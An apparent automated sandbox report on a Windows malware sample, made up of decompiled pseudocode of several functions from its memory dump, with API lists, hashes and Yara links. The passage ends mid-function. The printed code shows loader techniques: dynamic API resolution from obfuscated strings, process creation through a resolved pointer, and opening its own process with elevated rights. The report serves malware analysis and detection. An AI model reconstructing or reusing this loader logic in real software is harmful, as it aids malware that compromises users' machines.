                                                                                                                                                                                                                                • Opcode ID: bf0bc005ddbe151ba9beb5e9803e8639364fc55ebf957875e2f6ac8801b9f428
                                                                                                                                                                                                                                • Instruction ID: 7a8ce61136f1429ed12e8be6f8b13a22c387f072ba5391b7889174a861984695
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf0bc005ddbe151ba9beb5e9803e8639364fc55ebf957875e2f6ac8801b9f428
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE913771A00209EFCF11DFA4DE89AAE7BB9FF48350F144056F9059B261DB31E952DB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A974A5, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109librarymemoryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 73%
                                                                                                                                                                                                                                			E00A974A5(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E00A96856(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E00A9A929( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0xa9d298 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0xa9d2e0; // 0x453a5a8
					_t18 = _t47 + 0xa9e3b3; // 0x73797325
					_t68 = E00A91EBA(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0xa9d2e0; // 0x453a5a8
						_t19 = _t50 + 0xa9e760; // 0x4fd8d08
						_t20 = _t50 + 0xa9e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E00A97020();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E00A97020();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0xa9d270, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E00A953BB(_t70);
				goto L12;
			}


















                                                                                                                                                                                                                                0x00a974ad
                                                                                                                                                                                                                                0x00a974ad
                                                                                                                                                                                                                                0x00a974bc
                                                                                                                                                                                                                                0x00a974c3
                                                                                                                                                                                                                                0x00a974c8
                                                                                                                                                                                                                                0x00a975d5
                                                                                                                                                                                                                                0x00a975dc
                                                                                                                                                                                                                                0x00a975dc
                                                                                                                                                                                                                                0x00a974d7
                                                                                                                                                                                                                                0x00a974df
                                                                                                                                                                                                                                0x00a974e2
                                                                                                                                                                                                                                0x00a974e7
                                                                                                                                                                                                                                0x00a974fc
                                                                                                                                                                                                                                0x00a97502
                                                                                                                                                                                                                                0x00a97503
                                                                                                                                                                                                                                0x00a97506
                                                                                                                                                                                                                                0x00a9750c
                                                                                                                                                                                                                                0x00a9750f
                                                                                                                                                                                                                                0x00a97514
                                                                                                                                                                                                                                0x00a9751c
                                                                                                                                                                                                                                0x00a97528
                                                                                                                                                                                                                                0x00a9752c
                                                                                                                                                                                                                                0x00a975bc
                                                                                                                                                                                                                                0x00a97532
                                                                                                                                                                                                                                0x00a97532
                                                                                                                                                                                                                                0x00a97537
                                                                                                                                                                                                                                0x00a9753e
                                                                                                                                                                                                                                0x00a97552
                                                                                                                                                                                                                                0x00a97556
                                                                                                                                                                                                                                0x00a975a5
                                                                                                                                                                                                                                0x00a97558
                                                                                                                                                                                                                                0x00a97559
                                                                                                                                                                                                                                0x00a97560
                                                                                                                                                                                                                                0x00a97579
                                                                                                                                                                                                                                0x00a9757b
                                                                                                                                                                                                                                0x00a9757f
                                                                                                                                                                                                                                0x00a97586
                                                                                                                                                                                                                                0x00a975a0
                                                                                                                                                                                                                                0x00a97588
                                                                                                                                                                                                                                0x00a97591
                                                                                                                                                                                                                                0x00a97596
                                                                                                                                                                                                                                0x00a97596
                                                                                                                                                                                                                                0x00a97586
                                                                                                                                                                                                                                0x00a975b4
                                                                                                                                                                                                                                0x00a975b4
                                                                                                                                                                                                                                0x00a9752c
                                                                                                                                                                                                                                0x00a975c3
                                                                                                                                                                                                                                0x00a975cc
                                                                                                                                                                                                                                0x00a975d0
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A96856: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00A974C1,?,00000001,?,?,00000000,00000000), ref: 00A9687B
                                                                                                                                                                                                                                  • Part of subcall function 00A96856: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00A9689D
                                                                                                                                                                                                                                  • Part of subcall function 00A96856: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00A968B3
                                                                                                                                                                                                                                  • Part of subcall function 00A96856: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00A968C9
                                                                                                                                                                                                                                  • Part of subcall function 00A96856: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00A968DF
                                                                                                                                                                                                                                  • Part of subcall function 00A96856: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00A968F5
                                                                                                                                                                                                                                • memset.NTDLL ref: 00A9750F
                                                                                                                                                                                                                                  • Part of subcall function 00A91EBA: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,00A97528,73797325), ref: 00A91ECB
                                                                                                                                                                                                                                  • Part of subcall function 00A91EBA: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00A91EE5
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(4E52454B,04FD8D08,73797325), ref: 00A97545
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00A9754C
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 00A975B4
                                                                                                                                                                                                                                  • Part of subcall function 00A97020: GetProcAddress.KERNEL32(36776F57,00A96B1C), ref: 00A9703B
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000001), ref: 00A97591
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00A97596
                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000001), ref: 00A9759A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                                                                                                                                                                                                • String ID: Uxt$@MxtNxt
                                                                                                                                                                                                                                • API String ID: 3075724336-2342693527
                                                                                                                                                                                                                                • Opcode ID: ec861adf7d61599727047ac3c500e8140ec9491f614f770797ac6d76b59805ba
                                                                                                                                                                                                                                • Instruction ID: 4b6e45acbc1069486e0b72bd7b6c4e16bfce0cbd82b88943c1dee94a8b8df24c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec861adf7d61599727047ac3c500e8140ec9491f614f770797ac6d76b59805ba
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F3143B6A04208EFDF10EFE4DD89EAEBBFCEB04354F154466E505A7111D6309D45CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A95E8A, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 27%
                                                                                                                                                                                                                                			E00A95E8A(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0xa9d37c; // 0x4fd9818
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E00A99CCC(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0xa9c1ac;
				}
				_t46 = E00A91F9B(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E00A95157(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0xa9d2e0; // 0x453a5a8
						_t16 = _t75 + 0xa9eb10; // 0x530025
						 *0xa9d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E00A99CCC(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0xa9c1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E00A95157(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E00A953BB(_v20);
						} else {
							_t66 =  *0xa9d2e0; // 0x453a5a8
							_t31 = _t66 + 0xa9ec30; // 0x73006d
							 *0xa9d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E00A953BB(_v12);
				}
				return _v24;
			}




























                                                                                                                                                                                                                                0x00a95e92
                                                                                                                                                                                                                                0x00a95e98
                                                                                                                                                                                                                                0x00a95e9f
                                                                                                                                                                                                                                0x00a95ea5
                                                                                                                                                                                                                                0x00a95ea9
                                                                                                                                                                                                                                0x00a95ead
                                                                                                                                                                                                                                0x00a95eb0
                                                                                                                                                                                                                                0x00a95eb5
                                                                                                                                                                                                                                0x00a95eba
                                                                                                                                                                                                                                0x00a95ebc
                                                                                                                                                                                                                                0x00a95ebc
                                                                                                                                                                                                                                0x00a95ec5
                                                                                                                                                                                                                                0x00a95eca
                                                                                                                                                                                                                                0x00a95ecf
                                                                                                                                                                                                                                0x00a95ed5
                                                                                                                                                                                                                                0x00a95edf
                                                                                                                                                                                                                                0x00a95ee8
                                                                                                                                                                                                                                0x00a95eef
                                                                                                                                                                                                                                0x00a95f08
                                                                                                                                                                                                                                0x00a95f0d
                                                                                                                                                                                                                                0x00a95f12
                                                                                                                                                                                                                                0x00a95f1b
                                                                                                                                                                                                                                0x00a95f24
                                                                                                                                                                                                                                0x00a95f35
                                                                                                                                                                                                                                0x00a95f3e
                                                                                                                                                                                                                                0x00a95f42
                                                                                                                                                                                                                                0x00a95f46
                                                                                                                                                                                                                                0x00a95f4b
                                                                                                                                                                                                                                0x00a95f50
                                                                                                                                                                                                                                0x00a95f52
                                                                                                                                                                                                                                0x00a95f52
                                                                                                                                                                                                                                0x00a95f5c
                                                                                                                                                                                                                                0x00a95f65
                                                                                                                                                                                                                                0x00a95f6c
                                                                                                                                                                                                                                0x00a95f84
                                                                                                                                                                                                                                0x00a95f88
                                                                                                                                                                                                                                0x00a95fc5
                                                                                                                                                                                                                                0x00a95f8a
                                                                                                                                                                                                                                0x00a95f8d
                                                                                                                                                                                                                                0x00a95f95
                                                                                                                                                                                                                                0x00a95fa6
                                                                                                                                                                                                                                0x00a95fb2
                                                                                                                                                                                                                                0x00a95fba
                                                                                                                                                                                                                                0x00a95fbe
                                                                                                                                                                                                                                0x00a95fbe
                                                                                                                                                                                                                                0x00a95f88
                                                                                                                                                                                                                                0x00a95fcd
                                                                                                                                                                                                                                0x00a95fd2
                                                                                                                                                                                                                                0x00a95fd9

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00A95E9F
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?,80000002,00000005), ref: 00A95EDF
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 00A95EE8
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 00A95EEF
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(80000002), ref: 00A95EFC
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?,00000004), ref: 00A95F5C
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?), ref: 00A95F65
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?), ref: 00A95F6C
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00A95F73
                                                                                                                                                                                                                                  • Part of subcall function 00A953BB: RtlFreeHeap.NTDLL(00000000,00000000,00A912FA,00000000,?,?,00000000), ref: 00A953C7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen$CountFreeHeapTick
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2535036572-0
                                                                                                                                                                                                                                • Opcode ID: ddcd8de781299650ccbf20f007164713320139c8ead2621d22999f3514688682
                                                                                                                                                                                                                                • Instruction ID: 461894e36535d8db583475aea57643c2b17162a019dbc877ce8a1a85e4a1b5e2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ddcd8de781299650ccbf20f007164713320139c8ead2621d22999f3514688682
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53417976E00609FBCF12AFA4CD0AE9E7BB5EF44354F154465F904A7221DB319A11EFA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A922AB, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 63%
                                                                                                                                                                                                                                			E00A922AB(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0xa9d2e0; // 0x453a5a8
				_t1 = _t9 + 0xa9e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E00A91BB5(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E00A95157(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E00A973E0(_t34, _t41, _a8);
						E00A953BB(_t41);
						_t42 = E00A915FD(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00A953BB(_t36);
							_t36 = _t42;
						}
						_t43 = E00A9698B(_t36, _t33);
						if(_t43 != 0) {
							E00A953BB(_t36);
							_t36 = _t43;
						}
					}
					E00A953BB(_t28);
				}
				return _t36;
			}














                                                                                                                                                                                                                                0x00a922ab
                                                                                                                                                                                                                                0x00a922ae
                                                                                                                                                                                                                                0x00a922af
                                                                                                                                                                                                                                0x00a922b7
                                                                                                                                                                                                                                0x00a922be
                                                                                                                                                                                                                                0x00a922c5
                                                                                                                                                                                                                                0x00a922c9
                                                                                                                                                                                                                                0x00a922cf
                                                                                                                                                                                                                                0x00a922d6
                                                                                                                                                                                                                                0x00a922db
                                                                                                                                                                                                                                0x00a922ed
                                                                                                                                                                                                                                0x00a922f1
                                                                                                                                                                                                                                0x00a922f5
                                                                                                                                                                                                                                0x00a922fb
                                                                                                                                                                                                                                0x00a92300
                                                                                                                                                                                                                                0x00a92310
                                                                                                                                                                                                                                0x00a92312
                                                                                                                                                                                                                                0x00a92329
                                                                                                                                                                                                                                0x00a9232d
                                                                                                                                                                                                                                0x00a92330
                                                                                                                                                                                                                                0x00a92335
                                                                                                                                                                                                                                0x00a92335
                                                                                                                                                                                                                                0x00a9233e
                                                                                                                                                                                                                                0x00a92342
                                                                                                                                                                                                                                0x00a92345
                                                                                                                                                                                                                                0x00a9234a
                                                                                                                                                                                                                                0x00a9234a
                                                                                                                                                                                                                                0x00a92342
                                                                                                                                                                                                                                0x00a9234d
                                                                                                                                                                                                                                0x00a9234d
                                                                                                                                                                                                                                0x00a92358

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A91BB5: lstrlen.KERNEL32(00000000,00000000,00000000,770CC740,?,?,?,00A922C5,253D7325,00000000,00000000,770CC740,?,?,00A9A714,?), ref: 00A91C1C
                                                                                                                                                                                                                                  • Part of subcall function 00A91BB5: sprintf.NTDLL ref: 00A91C3D
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,00A9A714,?,04FD95B0), ref: 00A922D6
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?,?,?,00A9A714,?,04FD95B0), ref: 00A922DE
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                • strcpy.NTDLL ref: 00A922F5
                                                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,?), ref: 00A92300
                                                                                                                                                                                                                                  • Part of subcall function 00A973E0: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,00A9230F,00000000,?,?,?,00A9A714,?,04FD95B0), ref: 00A973F7
                                                                                                                                                                                                                                  • Part of subcall function 00A953BB: RtlFreeHeap.NTDLL(00000000,00000000,00A912FA,00000000,?,?,00000000), ref: 00A953C7
                                                                                                                                                                                                                                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00A9A714,?,04FD95B0), ref: 00A9231D
                                                                                                                                                                                                                                  • Part of subcall function 00A915FD: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00A92329,00000000,?,?,00A9A714,?,04FD95B0), ref: 00A91607
                                                                                                                                                                                                                                  • Part of subcall function 00A915FD: _snprintf.NTDLL ref: 00A91665
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                                                                                                                                                • String ID: =
                                                                                                                                                                                                                                • API String ID: 2864389247-1428090586
                                                                                                                                                                                                                                • Opcode ID: f4133d8f6439e9fb81c57ad8f31d9710b391974af3a2e0c91056896645665f38
                                                                                                                                                                                                                                • Instruction ID: cb9a3861128ccdbf6c95b482b0988df1d283de6879e53bcd37253c7b50696902
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4133d8f6439e9fb81c57ad8f31d9710b391974af3a2e0c91056896645665f38
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF11A333B01925778E12B7B48D96CBF3AED9E457A03050126F5059B202DE78CD0257E1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A96246, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A96246(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0xa9d2a4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0xa9d294 = _t4;
					_t6 = GetCurrentProcessId();
					 *0xa9d290 = _t6;
					 *0xa9d29c = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0xa9d28c = _t7;
					if(_t7 == 0) {
						 *0xa9d28c =  *0xa9d28c | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                                                                                                                                                                                                                0x00a9624e
                                                                                                                                                                                                                                0x00a96254
                                                                                                                                                                                                                                0x00a9625b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a962b5
                                                                                                                                                                                                                                0x00a9625d
                                                                                                                                                                                                                                0x00a96265
                                                                                                                                                                                                                                0x00a96272
                                                                                                                                                                                                                                0x00a96272
                                                                                                                                                                                                                                0x00a962b2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a962b2
                                                                                                                                                                                                                                0x00a96274
                                                                                                                                                                                                                                0x00a96274
                                                                                                                                                                                                                                0x00a96279
                                                                                                                                                                                                                                0x00a9628b
                                                                                                                                                                                                                                0x00a96290
                                                                                                                                                                                                                                0x00a96296
                                                                                                                                                                                                                                0x00a9629c
                                                                                                                                                                                                                                0x00a962a3
                                                                                                                                                                                                                                0x00a962a5
                                                                                                                                                                                                                                0x00a962a5
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a962ac
                                                                                                                                                                                                                                0x00a9626e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a96270
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00A94D41,?,?,00000001,?,?,?,00A95992,?), ref: 00A9624E
                                                                                                                                                                                                                                • GetVersion.KERNEL32(?,00000001,?,?,?,00A95992,?), ref: 00A9625D
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,00A95992,?), ref: 00A96279
                                                                                                                                                                                                                                • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,00A95992,?), ref: 00A96296
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000001,?,?,?,00A95992,?), ref: 00A962B5
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 2270775618-1701360479
                                                                                                                                                                                                                                • Opcode ID: ab9a15b7667cac9b87385100f101ce49c72b775d11c28505a9d598f533231203
                                                                                                                                                                                                                                • Instruction ID: f19bdbd271bfc111694c0dfe6cbd7d08bd8fa89076d82645a83f057376a37259
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab9a15b7667cac9b87385100f101ce49c72b775d11c28505a9d598f533231203
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15F0AF70B40701DBDF20CBB4AD1AB953BA4EB02761F10051BE506CA2E0DF70C482DF15
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A910E9, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00A91143
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(0070006F), ref: 00A91157
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00A91169
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A911D1
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A911E0
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A911EB
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$AllocFree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 344208780-0
                                                                                                                                                                                                                                • Opcode ID: 6f14e7bf0ff1fc24e8526ffc98057678d78a3e92e03d8d161298df9e20ad8020
                                                                                                                                                                                                                                • Instruction ID: 7bdf145583aa1cf3ba67a67d59ff94243f10d27175b5ce11f3f1b6ed22d81f1d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f14e7bf0ff1fc24e8526ffc98057678d78a3e92e03d8d161298df9e20ad8020
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04413336A0060AAFDF01DFF8D8456AEB7F5EF49310F144566EA10EB150DA719D06CB91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A96856, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A96856(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00A95157(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0xa9d2e0; // 0x453a5a8
					_t1 = _t23 + 0xa9e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0xa9d2e0; // 0x453a5a8
